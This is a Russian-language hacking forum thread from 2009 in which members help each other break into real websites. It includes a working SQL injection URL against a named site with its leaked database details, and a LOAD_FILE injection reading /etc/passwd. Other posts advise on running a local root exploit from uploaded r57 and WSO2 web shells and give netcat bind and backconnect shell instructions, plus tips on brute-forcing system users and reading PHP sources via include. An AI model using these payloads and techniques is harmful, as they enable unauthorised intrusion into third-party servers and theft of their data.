Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Это выводит не больше чем 1024 символа, тем более проблему именно с заменой части хеша на ***** не решает..
    ЗЫ Скрин
     
  2. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Поставь такие же настройки, потом тыкни Get Quantity, Get Names From Information_Schema, отметь нужные поля и нажми Get Data..
    СКРИН
     
  3. f1re

    f1re New Member

    Joined:
    3 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Песня не кончается. Get Quantity выполняется нормально, а вот на следующем пункте, после отправки двух запросов, Сипт затыкается. Скрин
     
  4. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Хм, по идее должно работать..
     
  5. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    http://www.rsci.ru/company/innov/?Number=10'
    как слепая не крутится, как обычная - тоже... помогите :)
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.rsci.ru/katalog/second.php?catID=2&PID=-108+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3/*


    Database Version: 4.0.27
    Database name: rsci
    User name: rsci@zvm8
    Os : zportbld-freebsd6.3
     
    1 person likes this.
  7. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    помогите пожалуйста, уважаемые ачатовцы.
    Есть сервак с линем Linux Kernel 2.6.29 и нанём shell WSO2.

    Есть локальный сплоит для поднятия рута на С++.

    http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29

    Я кагбы новинький в сплоитах, плиз, напишити по конреней дейсвия для его запуска.
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 nub-hacker посмотри видео с того же милворма... первую часть до залития шелла можешь пропустить..а дальше ответ на твой вопрос

    http://milw0rm.com/video/watch.php?id=92
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    nub-hacker
    https://forum.antichat.ru/showthread.php?t=26510
     
  10. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Спасибо, подскажи плиз, какой там шелл.
     
  11. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    В видио видно что это locus7Shell
     
  12. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 f1re
    Возьми Сипт по старее, та версия что у тебя - славится плохой работой с инфо.шема.
     
  13. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Помогите плиз. я так понял что надо открыть на серваке порт для начала. Я юзаю R57SHELL. Я выбрал

    выставил порт 333
    Использовать "C"

    далее конктюсь так


    C:\Documents and Settings\Серёжа>telnet sitewithshell 333
    Подключение к sitewithshell...Не удалось открыть подключение к этому узлу, на
    порт 333: Сбой подключения

    помогите плиз
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    nub-hacker ну ты реально нуб...у себя запускай неткат к тебе сервак конектится а не ты к нему..на то и бакконнект
     
  15. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Дело в том, что я нему быть в роли сервака т.к. я сижу за NATom и проброс портов не могу сделать т.к. NAT осуществляется у прова а не у меня на модеме ((((((((((((
    помогите плиз.
    //Orb помоги плиз. я тогда буду юзать wso2


    /// Какиенить статьи по этому поводу есть на Ачате?
     
    #7875 nub-hacker, 3 Jul 2009
    Last edited: 3 Jul 2009
  16. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    nub-hacker, привет Серёжа =)
    делай конект через дедик

    jokester: Я узнал его первее, даже без модцп и подсказок. Называй его скорпиончик :)
    Spyder: Как мило)
    Grey: давайте ему минусов за@#$чим для разнообразия?
     
    #7876 Spyder, 3 Jul 2009
    Last edited by a moderator: 4 Jul 2009
  17. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Просстите ещё вопрос.
    http://site.name/index.php?шв=777+union+select+concat_ws(0x3a,LOAD_FILE(0x2f6574632f706173737764)),2,3,4,5+limit+1,1/*

    Вот инъекция под рутом. По всей видимости использыется ковычек вырбленно т.к с /etc/passwd не вышло и пишлось hexить.

    Надо создать файл в /tmp/phpinfo.php

    и вбить код <?phpinfo();?>
    =========
    https://forum.antichat.ru/threadnav34338-1-10.html
    читал эту статью,так что не думай Joker что я не чего не читаю.
    но там заливаеться шелл при помощи слэшов.


    У меня по всей видимости такое не прокатит? или я ошибаюсь??
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Люди,что означает это ?

    credit_card:x:1301:1001::/home/card:/usr/bin/passwd

    /usr/bin/passwd не шелл же?))У других стоит но логин(нету то бишь),а у других норм - башик...
     
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    У тебя цель - забиндить или бэкконнект замутить ? Если забиндить,то запусти netcat со своего компа или откуда-то ещё.Предварительно открой на шелле произвольный незанятый порт.Проверь с помощью grep(хз как) или средствами,которые уже существуют в шелле.Если твой порт отобразился - порт открыт.После этого берёшь netcat и запускаешь его со следуцюищми параметрами:

    nc host port.Например: nc www.wiw.ru 35149

    Если вылетит оболочка шелла с приглашением,то тебе повезло =).При бэкконнекте делай так,как сказал тебе мой дорогой Горе Gorev :):):).Если бинд не катит,то придётся брутить системных юзеров и получать шелл с правами,дабы сменить настройки фаера.Иногда права есть не только у рута+ админы косячат иногда жестко))).Проблемы с натом ? Бери нормальную тачку и вперёд)
     
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Пипл,почему не читаются исходники рнр скриптов?! инклудом.В других подхостеровских папках читаются хтмл файлы...чем же рнр так отличается от хтмл ? Или же там такие жестки настройки даже для поддоменов хостеровских ?!

    И ещё вопрос:в каких файлах на сервере может храниться префикс MySql ?
     
Thread Status:
Not open for further replies.